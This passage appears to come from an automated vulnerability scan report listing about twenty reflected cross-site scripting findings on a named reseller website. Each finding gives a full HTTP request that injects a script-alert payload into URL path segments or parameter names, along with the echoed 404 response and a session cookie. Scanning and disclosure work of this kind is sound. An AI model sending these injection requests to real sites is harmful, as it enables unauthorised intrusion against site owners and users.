This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5b23ce<script>alert(1)</script>147bf15d8ff/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5b23ce<script>alert(1)</script>147bf15d8ff/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3375. http://www.resellerbase.com/detail/5/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a9565<script>alert(1)</script>22526c0dbac was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themesa9565<script>alert(1)</script>22526c0dbac/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themesa9565<script>alert(1)</script>22526c0dbac/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3376. http://www.resellerbase.com/detail/5/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b64db<script>alert(1)</script>906746001a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmosb64db<script>alert(1)</script>906746001a/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmosb64db<script>alert(1)</script>906746001a/ was not found on this server.</p>
...[SNIP]...

2.3377. http://www.resellerbase.com/detail/5/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2f432<script>alert(1)</script>b3890720e12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/?2f432<script>alert(1)</script>b3890720e12=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/?2f432<script>alert(1)</script>b3890720e12=1 was not found on this server.</p>
...[SNIP]...

2.3378. http://www.resellerbase.com/detail/5/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 83d70<script>alert(1)</script>70e378c3e3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail83d70<script>alert(1)</script>70e378c3e3f/5/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail83d70<script>alert(1)</script>70e378c3e3f/5/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3379. http://www.resellerbase.com/detail/5/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b9b52<script>alert(1)</script>e720ee281e4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5b9b52<script>alert(1)</script>e720ee281e4/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.3380. http://www.resellerbase.com/detail/5/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7df5a<script>alert(1)</script>7cedc593218 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes7df5a<script>alert(1)</script>7cedc593218/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes7df5a<script>alert(1)</script>7cedc593218/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3381. http://www.resellerbase.com/detail/5/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8008a<script>alert(1)</script>ceee95e7250 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos8008a<script>alert(1)</script>ceee95e7250/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos8008a<script>alert(1)</script>ceee95e7250/images/ was not found on this server.</p>
...[SNIP]...

2.3382. http://www.resellerbase.com/detail/5/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bb851<script>alert(1)</script>ecb03dd6f19 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/imagesbb851<script>alert(1)</script>ecb03dd6f19/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/imagesbb851<script>alert(1)</script>ecb03dd6f19/ was not found on this server.</p>
...[SNIP]...

2.3383. http://www.resellerbase.com/detail/5/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e0a51<script>alert(1)</script>315b9acf1f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/?e0a51<script>alert(1)</script>315b9acf1f5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/?e0a51<script>alert(1)</script>315b9acf1f5=1 was not found on this server.</p>
...[SNIP]...

2.3384. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e1e2e<script>alert(1)</script>303bb928a53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile1e2e<script>alert(1)</script>303bb928a53/5/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile1e2e<script>alert(1)</script>303bb928a53/5/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3385. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6812c<script>alert(1)</script>7e94fae8e8d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/56812c<script>alert(1)</script>7e94fae8e8d/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/56812c<script>alert(1)</script>7e94fae8e8d/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3386. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 79b00<script>alert(1)</script>73db13305ad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes79b00<script>alert(1)</script>73db13305ad/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes79b00<script>alert(1)</script>73db13305ad/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3387. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 962a9<script>alert(1)</script>ead5029af7d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos962a9<script>alert(1)</script>ead5029af7d/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos962a9<script>alert(1)</script>ead5029af7d/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3388. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 13855<script>alert(1)</script>6eb819a3465 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images13855<script>alert(1)</script>6eb819a3465/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images13855<script>alert(1)</script>6eb819a3465/rating/ was not found on this server.</p>
...[SNIP]...

2.3389. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7ddeb<script>alert(1)</script>11f63f5a680 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/rating7ddeb<script>alert(1)</script>11f63f5a680/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/rating7ddeb<script>alert(1)</script>11f63f5a680/ was not found on this server.</p>
...[SNIP]...

2.3390. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1ad6a<script>alert(1)</script>c8192ace741 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/rating/?1ad6a<script>alert(1)</script>c8192ace741=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/rating/?1ad6a<script>alert(1)</script>c8192ace741=1 was not found on this server.</p>
...[SNIP]...

2.3391. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/4half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cf09b<script>alert(1)</script>f06a6178c3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailcf09b<script>alert(1)</script>f06a6178c3c/5/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailcf09b<script>alert(1)</script>f06a6178c3c/5/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.3392. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/4half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e4501<script>alert(1)</script>96e7568c4f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5e4501<script>alert(1)</script>96e7568c4f1/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5e4501<script>alert(1)</script>96e7568c4f1/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.3393. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/4half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 70128<script>alert(1)</script>e4b69112ed2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes70128<script>alert(1)</script>e4b69112ed2/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes70128<script>alert(1)</script>e4b69112ed2/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.3394. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/4half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 913d4<script>alert(1)</script>0610dd3d95a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

